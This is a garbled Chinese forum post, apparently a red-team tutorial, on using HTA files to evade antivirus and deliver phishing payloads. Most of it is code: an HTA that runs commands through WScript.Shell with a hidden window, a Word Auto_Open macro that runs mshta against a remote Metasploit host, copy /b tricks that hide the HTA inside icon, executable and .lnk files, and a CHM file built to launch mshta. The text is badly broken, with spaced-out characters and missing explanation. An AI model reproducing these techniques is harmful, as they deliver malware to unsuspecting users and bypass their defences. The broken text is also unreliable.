[27139] 2021-01-15_利用HTA文件绕过杀软及邮件钓

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-19
2021-01-15_利用HTA文件绕过杀软及邮件钓 H T A     M s 0 8 0 6 7   2 0 2 1 - 0 1 - 1 5   #   , 2 8         j o k e l o v e M s 0 8 0 6 7 0 x 0 1   H T A H T M L   A p p l i c a t i o n H T A V B H T A j a v a s c r i p t V B < ! - - t e s t 1 . h t a - - > < h t m l > < h e a d > < t i t l e > O N E -   < / t i t l e > < / h e a d > < b o d y > < c e n t e r > < p > H T A H T M L A p p l i c a t i o n H T M L   T E S T < / p > < / c e n t e r >
:   m s h t a   % c d % / t e s t . h t a   h t a h t a h t a m s h t a V B S c r i p t c m d : m s h t a . e x e   % w i n d i r % s y s t e m 3 2 m s h t a . e x e   a n d   % w i n d i r % s y s w o w 6 4 m s h t a . e x e < / c e n t e r > < / b o d y > < s c r i p t   L A N G U A G E = " V B S c r i p t " > / /   C r e a t e O b j e c t ( " W S c r i p t . S h e l l " ) . r u n ( " c a l c " ) < / s c r i p t > < / h t m l > < H T A : A P P L I C A T I O N   i c o n = " # "   W I N D O W S T A T E = " m i n i m i z e "   S H O W I N T A S K B A R = " n o " S Y S M E N U = " n o "   C A P T I O N = " n o "   / > m s h t a . e x e   j a v a s c r i p t : " < s c r i p t L A N G U A G E = " V B S c r i p t " > C r e a t e O b j e c t ( " W S c r i p t . S h e l l " ) . r u n ( " c a l c " ) r n c l o s e ( ) < / s c r i p t > "
  -   m e t a s p l o i t h t a w o r d 线 S u b   T e s t ( ) P I D   =   S h e l l ( " m s h t a . e x e   h t t p : / / 1 0 . 2 1 1 . 5 5 . 9 : 8 0 8 0 / X s F T b f 3 G Z Y i i z . h t a " ) E n d   S u b S u b   A u t o _ O p e n ( ) T e s t E N D   S u b
0 x 0 2   H T A M S H T A h t a   . h t a     . h t m l   M i s c o s o f t m s h t a . e x e   h t a h t a : e x e e x e h t a e x e m s h t a s h e l l c o d e e x e 使 使 L N K   r e a d m e 2 . t x t . l n k   r e a d m e . t x t 使 m s h t a   r e a d m e 2 . t x t . l n k m s h t a c h m   H T M L   H e l p   W o r k s h o p H P P c o p y   / b   b e a u t y . i c o + t e s t . h t a   t e s t _ w i t h _ b e a u t y . h t a < H T A : A P P L I C A T I O N   i c o n = " # "   / > c o p y   / b   % w i n d i r % s y s t e m 3 2 c a l c . e x e + t e s t . h t a   c a l c 2 . e x e c a l c 2 . e x e   #   m s h t a   % c d % c a l c 2 . e x e   #   H T A C o p y   / b   r e a d m e . t x t . l n k + t e s t . h t a   r e a d m e 2 . t x t . l n k
3 .   H e l l o . h t m 4 .   使 H T M L   H e l p   W o r k s h o p     c h m   h e l l o . h t m 1 0 h t a h t a 0 x 0 3   1 .   o f f i c e [ O P T I O N S ] C o m p a t i b i l i t y = 1 . 1   o r   l a t e r C o m p i l e d   f i l e = h e l l o . c h m D e f a u l t   t o p i c = h e l l o . h t m D i s p l a y   c o m p i l e   p r o g r e s s = N o L a n g u a g e = 0 x 4 1 0   I t a l i a n   ( I t a l y ) [ F I L E S ] h e l l o . h t m [ I N F O T Y P E S ] < h t m l > < t i t l e >   H e l l o   W o r l d !   < / t i t l e > < h e a d > < / h e a d > < b o d y > < O B J E C T   i d = s h o r t c u t   c l a s s i d = " c l s i d : 5 2 a 2 a a a e - 0 8 5 d - 4 1 8 7 - 9 7 e a - 8 c 3 0 d b 9 9 0 4 3 6 "   w i d t h = 1   h e i g h t = 1 > < P A R A M   n a m e = " C o m m a n d "   v a l u e = " S h o r t C u t " > < P A R A M   n a m e = " B u t t o n "   v a l u e = " B i t m a p : s h o r t c u t " > < P A R A M   n a m e = " I t e m 1 "   v a l u e = " , c m d , / c   m s h t a   % C D % h e l l o . c h m " > < P A R A M   n a m e = " I t e m 2 "   v a l u e = " 2 7 3 , 1 , 1 " > < / O B J E C T > < S C R I P T > s h o r t c u t . C l i c k ( ) ; < / S C R I P T > < h 2   a l i g n = c e n t e r >   C H M   E x a m p l e   < / h 2 > < p > < h 3   a l i g n = c e n t e r >   T h i s   i s   a   m a l i c i o u s   C H M   f i l e   < / h 3 > < / p > < / b o d y > < / h t m l   , c m d , / c   m s h t a   % C D % h e l l o . c h m c o p y   / b   h e l l o . c h m + t e s t . h t a   h e l l o . c h m
2 .   m d 5  
  3 5 0 0 0 +
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则